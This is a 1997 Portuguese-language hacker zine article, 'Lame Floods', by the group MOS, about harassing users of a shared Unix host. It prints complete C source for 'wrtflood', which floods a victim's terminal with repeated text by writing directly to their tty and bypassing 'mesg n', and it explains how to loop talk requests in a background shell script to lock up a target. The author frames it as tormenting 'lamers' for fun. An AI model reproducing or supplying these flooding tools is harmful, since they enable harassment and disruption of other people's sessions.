14: Lame Floods
ZZzzz... pelos meus calculos deve ser 4:30 da manha... eu ja parei faz tempo de olhar o relogio... saco cheio... tedio.. tedio... ah.... tem dias a unica vontade que nos temos e' de pegar um lamer metido a hacker e tacar na bunda dele ate o sistema dizer chega.. DoS? Nao.. he he... o DoS simplesmente trava a maquina.. e legal ver o desespero na cara do lamer, e legal ver ele se debater ate finalmente desistir e puxar o fio do telefone do modem.. he he.. realmente to sem saco. entao resolvi fazer isso pra pegar no sono..Nao quero de forma alguma comecar a entrar em detalhes extremamente tecnicos e teoricos a respeito de seguranca informatica pois isso e um saco.. o tal zine RWX faz isso... a questao e q exploits e patches podem ser encontrados em centenas d listas d segurancas como CERT, BUGTRAQ, ... e eu nao to afim d copiar mais uns poucos bugs porq os putos admins simplesmente tem preguica de procurar... o pessoal tem a tendencia d confudir a MOS como apenas um grupo de "hackers"... nao.. nos nao destruimos sistemas, e os sistemas q invadimos estamo sempre prontos a auxiliar... so q esse zine nao e nenhum pouco dedicado a seguranca.. ja existe gente cuidando disso.
(1). Write Floods
Hmm.. write () e a coisa mais escrota q ja inventaram.. bom.. nosso lamer hacker e esperto, ele le AXUR05 todo dia e visita sempre a BugTraq, esta atualizado.. entao ele todo confiante te da uma shellzinha la no host dele e dexa vc dar uma olhada.. Isso pouco gente sabe, mas quando voce da um 'mesg n', simplesmente gera um flag q e testado pelo 'write' toda vez q vc o roda.. se for 'y' ele envia a mensagem, se for 'n', ela e bloqueada Acontece q se vc enviar direto pro tty, s/ se preocupar com as setagens, d nada adianta o 'mesg n'... Flagin SuX.
/*
Wrtflood
(c) 1997, Wyz4rd [MOS]
Comments to: mos@thepentagon.com
Plzea, l3arn portuguese. Another lamaware wroted on a boring night..
This shit has a little problem.. it's good to run it on
background but don't force it via 'fg' or the flood will
be interrupted until you back to it
To make the guy craise insert a sleep (1) hehehe... >=)
P.s.: I shit on this code fuck boys.. wait more on Phrack :P Wrtlood.c
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
main (int argc, char *argv [])
{
FILE *fp;
int Cont;
if (argc < 3)
{
printf ("\nWrtflood");
printf ("\n(c) 1997, by Wiz4rd [MOS].\n");
printf ("\nSintax: wrtflood [/dev/ttyX] [frase] [# de vezes]\n");
exit (-1); }
fp = fopen (argv [1], "r+b");
if (fp == NULL)
{
printf ("\nError ascessing %s", argv [1]);
printf ("\nAborting...\n");
exit (-1); }
printf ("\nFlooding ...\n");
for (Cont = atoi (argv [3]); Cont != 0; Cont --)
{
fprintf (fp, " %s", argv [2]);
}
fclose (fp);
printf ("Ok!\n");
}(2). Talk Floods
Esse e um saco alem de se executar remoto... no caso do cara bobear ele com certeza vai travar legal.. O talk request da uma interrupcao gostosa... tipo.. se o cara tiver varias secoes abertas, todas com o mesmo user e IP (obvio..) hehe.. exitem scripts para mIRC qe fazem isso.. eles atacam usuarios Unix... e bem interessante
E simples escrever-se um shell script que ira executar um loop e floodar o cara com um monte d talks.. o segredo e', alem d rodar o programa em background, fazer com qe apos cada request ele gere um ^C d forma a nao ser tb floodado junto com o cara.
Wiz4rd
